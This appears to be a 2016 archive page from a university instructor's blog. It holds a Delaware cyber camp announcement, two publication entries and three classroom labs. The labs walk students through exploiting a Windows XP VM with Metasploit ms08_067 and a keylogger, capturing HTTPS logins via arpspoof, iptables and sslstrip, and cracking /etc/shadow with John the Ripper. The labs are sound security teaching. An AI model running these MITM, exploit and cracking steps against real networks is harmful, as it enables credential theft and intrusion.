Monthly Archives: May 2016

US Cyber Challenge – Cyber Camps in Dover

LINK FROM  https://digiknow.dti.delaware.gov/pages/cybersecurity_challenge/2016default.shtml 

WHAT

Weeklong day camp for students comprised of cyber security workshops, labs, and a competition held on the last day. The camp will focus on topics such as intrusion detection, penetration, and forensics. Workshops will be taught by instructors from the SANS Institute, the largest source for information security training and certification in the world.  The overall objective is to attract as many talented and skilled people as possible to this field of study and career path.

WHO

College and graduate students and high school students. Students need to have completed their sophomore year of high school by the time of the camp. Campers under 18 years of age will need a parent’s consent to attend the camp.

Camp alumni may compete again, but priority for camp positions will go to non-alumni. Camp alumni are encouraged to volunteer to be camp teaching assistants.

WHERE

Delaware State University
Martin Luther King Jr. Student Center
Parlor B&C
1200 N. DuPont Hwy
Dover, DE 19901

Meals will also be provided at the camp (continental breakfast, lunch and snacks).

WHEN

Monday, July 11, 2016 – Friday, July 15, 2016
Friday features a competition, a winners’ ceremony and a press event.

FEES

Some camp attendee fees will be covered by Corporate and USCC scholarships.  In some cases the student will be responsible for a modest fee to attend the camp.

ELIGIBILITY & QUALIFICATION

Eligibility and Qualification for the Delaware Summer Camp is determined by the results of the2016 online Cyber Quests program. This is a fun but challenging on-line competitions allowing participants to demonstrate their knowledge in a variety of information security realms. Each challenge features an artifact for analysis, along with a series of quiz questions. Some focus on a potentially vulnerable sample web server as the artifact, challenging participants to identify its flaws using vulnerability analysis skills. Others are focused around forensic analysis, packet capture analysis, and more. They have varying levels of difficulty and complexity, with some geared toward beginners, while others include more intermediate and ultimately advanced material.

In-class exercises 3 Using Armitage and metasploit to attack a host and install a key logger

You need a WinXP and Kali VMs.  Make sure the network adapters of them were set into Bridged Adapter mode. In our labs, the victims can be any computers in the same local network. To keep us safe, we use WinXP as a target. I will share with you these two VMs.

 

  • Start your Windows XP, Turn off your firewall (Start->Settings->Control panel->Security Center->Windows Firewall->Turn off). Download HoneyBot through Blackboard. Install it and run the HoneyBot. Record your Windows XP’s ip address.
  • Turn off your firewall in WinXP.
  • Start metasploit service in Kali. root@kali:
  • service postgresql      start
  • service metasploit start
  • Start Armitage. root@kali:  armitage, then click connect.
  • It prompts up a question related to RPC server. Click Yes.
  • In Armitage, host->clear database
  • Host->add host->input your WinXp’s IP address
  • Host->msf scan
  • Select your host
  • Attacks->find attacks
  • Right click the host, you will see “attacks”, then choose iis->iis_webdav_upload->launch.
  • You will see this attack failed.
  • Right click the host, you will see “attacks”, then choose smb->ms08_067_netapi, then check “use a reverse connection”, ->launch.
  • You will see your WinXP is attacked. Save a screen as follows:
  • 6
  • After you successfully conducted an attack, you can do anything you want.
  • Right click the host -> Meterpreter 1-> Explore->Log keystokes->lauch
  • 5
  • Go to WindowXp, login your gmail account.
  • Go back to Kali, take a screen image and turn it in.
  • You need to try all others under Explore option. Record the work you have done.
  • Go to Windows XP, Turn on your firewall (Start->Setteings->Control panel->Security Senter->Windows Firewall->Turn on). Repeat 7-20. Take a screenshot image.
  • Make your comments to this lab.
  • Submit your report to the Blackboard.

4

 

In-class exercise 2: Sniff the https passwords using sslstrip in Kali linux

What you need:  Kali101 Linux  and Windows XP VMs.

Import them in your Virtual box.

User name of kali: root      PWD: SCIA472    (They are Shift+S  Shift+S Shift+I Shift+A 472).

This lab can steal all the passwords in a subnet. Please set the network of them to bridged adapter mode, turn off the firewall of Win XP, and give the WinXP 1024M memory.

1 Find you default gateway and interface connected with the victim in Kali:   netstat  -r

1

In this lab,  it should be   192.168.0.1 and the interface is eth0. Write down them for later reference.

2 Find your WinXP’s IP address (it is the victim) in Window XP:  ipconfig  /all

Write your victim’s IP address.

3 Start a new terminal in Kali, type the following command:

echo  1  >  /proc/sys/net/ipv4/ip_forward

This command enables ip forwarding by writing the value 1 in the file specified path.

Remember to do any MITM we need our box to act like a router and be able to forward packets that does not have its ip address in it as the destination.

4 Now we need to set up iptables, so that it will redirect traffic from port 80 to port 10000.

iptables  -t nat -A PREROUTING -p tcp  –destination-port 80 -j REDIRECT –to-port 10000

It starts iptables. –t=tables, nat=this table is consulted when a packet that creates a new connection is encounted. –A is an instruction to append one or more rules to the accepted chain. PREROUTING is one of the built-ins of the NAT table option. It is for altering packets as soon as they come in. –p specifies a protocol, in this case we said tcp. –destination-port we specify port 80 as the destination port. –j specifies an action. And we follow that with the action of redirect (REDIRECT). We redirect to port 10000 because this is the port sslstrip listens on by default.

5 Now just open up another terminal and get ip address of your victim (ip address of your Windows XP).

6 arpspoof  -i  eth0 (your interface)  -t    victim’s ip (WinXp’s address)     default gateway’s ip (192.168.0.1)

-t= target, Arpspoof basically sends arp replies to the target (you WinXp’s address).

The second ip is gateway’s ip, which is the ip we are “pretending” to be. Essentially we are telling the target that we are the gateway.

7 sslstrip   -k    -l   10000  -w  /root/Desktop/sslstrip.log

-k= kill all the sessions in the progress (forces the target ssl session to restart if already going, allows for the tool to work on sessions already established),  -l= listening on port 10000. –w=write the logs into /root/Desktop/sslstrip.log file.

Now tracking the log file which sslstrip produces.

8 In your 1st terminal in Kali:   tail  -f  /root/Desktop/sslstrip.log

 

10  In Windows XP,  Open IE explore, delete history files,  login your  amazon account and gmail account using a fake password. (you can try the online bank account later).

11  You will see the passwords in plain text  in terminal and sslstrip.log

Take a screenshot showing this in Kali by Applications->Accessories->Screenshot

12  In Windows Xp, Open Firefox,   login your facebook and gmail accout

13  What’s the difference between this results and the previous results?

14 Submit a screen image like this to Blackboard.

2

Refer to: http://robospatula.blogspot.com/2013/12/man-in-the-middle-attack-arpspoof-sslstrip.html

Extra bonus:  (3 points)

15  Open a new terminal:

ifconfig eth0 down

macchanger    -mac  00:22:33:44:55:66    eth0 (my interface)

ifconfig  eth0  up

16  ettercap  -T   -q  -M  arp:remote   /victim’s ip/    /gateway’s ip/

(there is no space between / and IP address)

-T simply specifies text only mode. –q specifies quiet mode. Does not print packet content (since we don’t need this). –I eth0 specifies ethernet 0 as the interface to listen on.

17  sslstrip   -k    -l   10000 -w  /root/Desktop/ettercap.log

In Windows Xp,  start IE explore, login your gmail account. Return to kali machine,

18 Open a new terminal:

tail -f /root/Desktop/ettercap.log  

You can see the passwords in the terminal. Save a screen image.

19 Write down your comments on this lab at the end of your report.

20 Turn it in Blackboard.

In-class Exercise 1: Cracking Passwords with John the Ripper

In-class Exercise 1: Cracking Passwords with John the Ripper (Sharon)

Password protection is important in any platform as is building robust passwords. You will need a copy of Kali Linux, as discussed previously, to perform this exercise. John and Ripper will be used to crack passwords. John performs different types of cracks: single mode; dictionary (wordlist mode), the one performed in this exercise, which applies a dictionary list of passwords for comparison; and brute-force (incremental) mode, which is the slowest of the three modes and attempts every combination of letters and numbers. You can download the Kali Linux and WinXP VMs at   http://ciswww.desu.edu/~xhei/

  • Start Kali virtual machine.
  • Login: root   Password:  SCIA472

Before attempting to crack the existing passwords, enter a few more users to see how fast the passwords can be cracked.

  • root@kali: adduser user1
  • set the password to password
  • root@kali: adduser  user2
  • set the password to P@ssw0rd
  • root@kali: adduser  user3
  • set the password to !P@ssw0rD1

After the three users have been added, you will want to execute John.

  • ApplicationsàBackTrack->Provilege Escalation->Password Attacks->Offline Attacks-> john the ripper
  • root@kali:/pentest/passwords/john#: john /etc/shadow
  • Give it time to see how long it takes for each password to be cracked. Record those times here: User1:______ User2:_______User3:______
  • Refection: Did you notice a correlation between the times it took to crack a password versus the complexity of the password? You should have seen that more complex passwords take longer to recover.
  • Write your comment to this exercise including what you have learned, more practices you can think of, and what can be improved about this exercise.
  • Turn it in Blackboard by Tonight.

2016(2)

  1. You Cannot Sense My PINs: A Side Channel Attack Deterrent Solution for Touch-enabled Devices
    Caijin Ling, Xiali Hei, Kam Kong, Michael Peays, and Mohsen Guizani. GLOBECOM 2016: 1-7.
    BibTeX
    @inproceedings{DBLP:conf/globecom/LingHKPG16,
    author = {Caijin Ling and
    Xiali Hei and
    Kam Kong and
    Michael Peays and
    Mohsen Guizani},
    title = {You Cannot Sense My PINs: {A} Side-Channel Attack Deterrent Solution
    Based on Haptic Feedback on Touch-Enabled Devices},
    booktitle = {2016 {IEEE} Global Communications Conference, {GLOBECOM} 2016, Washington,
    DC, USA, December 4-8, 2016},
    pages = {1–7},
    year = {2016},
    crossref = {DBLP:conf/globecom/2016},
    url = {https://doi.org/10.1109/GLOCOM.2016.7842394},
    doi = {10.1109/GLOCOM.2016.7842394},
    timestamp = {Tue, 23 May 2017 01:12:48 +0200},
    biburl = {http://dblp.uni-trier.de/rec/bib/conf/globecom/LingHKPG16},
    bibsource = {dblp computer science bibliography, http://dblp.org}
    }

  2. Jian Zhao and Xiali Hei, Magnetic communication based secure channel for wireless insulin pump, Book chapter, 2016.